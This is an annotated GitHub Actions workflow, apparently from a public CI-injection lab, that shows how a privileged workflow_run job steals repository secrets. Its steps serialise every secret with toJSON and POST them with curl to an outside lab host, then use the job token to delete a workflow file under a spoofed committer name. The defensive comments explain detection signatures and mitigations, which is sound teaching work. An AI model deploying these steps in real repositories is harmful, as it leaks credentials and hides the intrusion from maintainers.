# Demonstration payload from a public CI-injection lab (the fork banner on the
# page names CycodeLabs/gh-injection-vuln-demo). The steps below are what an
# attacker-controlled workflow does once it runs with repository privileges;
# the comments describe the risk each line carries and what a defender should
# look for. Indentation restored from the whitespace-mangled page rendering.
name: Exposing ALL Secrets
# `on` is a YAML 1.1 boolean key; GitHub's loader handles it, so suppress
# yamllint `truthy` here rather than renaming the key.
on:
  # workflow_run triggers execute in the context of the base repository, with
  # its secrets and a GITHUB_TOKEN, even when the upstream run was caused by a
  # pull request from a fork (per GitHub docs) — this is the trust boundary
  # the demo crosses. Audit every workflow_run trigger for what it checks out
  # and executes.
  workflow_run:
    workflows: ["Vuln"]
# write-all grants every token scope, including the contents:write the second
# step relies on. A least-privilege policy is an explicit map (e.g.
# `permissions: { contents: read }`) or the org/repo default set to read-only.
permissions: write-all
env:
  WORKFLOW_NAME: "innocent_workflow.yml"
  MAINTAINER_NAME: "Maintainer Name"
  # value is shown as rendered on the page; presumably redacted upstream
  MAINTAINER_EMAIL: "[email protected]"
  COMMIT_MESSAGE: "innocent commit message"
  # exfiltration endpoint (lab host, non-standard port). Plain scalar is safe
  # here (no `: ` or ` #`), but any outbound URL in a workflow env block
  # deserves egress-policy review.
  URL: http://lab.cycode.com:64375
jobs:
  expose_secrets:
    runs-on: ubuntu-latest
    steps:
      # `toJSON(secrets)` serialises every secret visible to the job into the
      # shell script and the POST body. `${{ toJSON(secrets) }}` or a bare
      # `${{ secrets }}` inside a `run:` step is a high-confidence detection
      # signature for secret exfiltration; GitHub's log masking does not
      # protect a value that is written to a file and sent over the network.
      - run: |
          echo "${{ toJSON(secrets) }}" > .secrets
          curl -X POST --data "@.secrets" $URL
      # Uses the job's token (write-capable because of write-all above) to
      # look up and then delete the workflow file named in WORKFLOW_NAME via
      # the Contents API — a track-covering step. Indicators: a commit that
      # removes a file under .github/workflows made through the API rather
      # than a reviewed PR. Branch protection with required reviews on the
      # default branch and read-only token defaults both block this step.
      - run: |
          SHA=$(curl -X GET -H "Authorization: Token ${{ github.token }}" https://api.github.com/repos/$GITHUB_REPOSITORY/contents/.github/workflows/$WORKFLOW_NAME -s | jq -r .sha)
          curl -X DELETE -H "Authorization: Token ${{ github.token }}" https://api.github.com/repos/$GITHUB_REPOSITORY/contents/.github/workflows/$WORKFLOW_NAME -d '{"message":"$COMMIT_MESSAGE","committer":{"name":"$MAINTAINER_NAME","email":"$MAINTAINER_EMAIL"}, "sha":"'"${SHA}"'"}'